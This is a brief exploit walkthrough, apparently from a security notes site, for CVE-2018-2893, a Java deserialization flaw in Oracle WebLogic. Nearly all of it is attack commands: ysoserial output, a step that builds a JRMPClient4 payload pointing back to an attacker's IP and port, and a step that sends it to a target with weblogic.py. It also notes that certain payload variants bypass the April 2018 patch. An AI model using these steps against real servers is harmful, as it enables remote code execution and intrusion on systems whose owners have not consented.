CVE-2018-2893¶
Tools author¶
https://github.com/pyn3rd/CVE-2018-2893
Step 1¶
java -jar ysoserial-cve-2018-2893.jar
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
JRMPClient @mbechler
JRMPClient2
JRMPClient3
JRMPClient4
Jdk7u21 @frohoff
Step 2¶
java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser
Step 3¶
python weblogic.py <host> <port> poc4.ser
Note: Any one of JRMPClient2|JRMPClient3|JRMPClient4 can be utilized to bypass the Critical Patch Update April 2018.¶
最后更新: 2023-10-12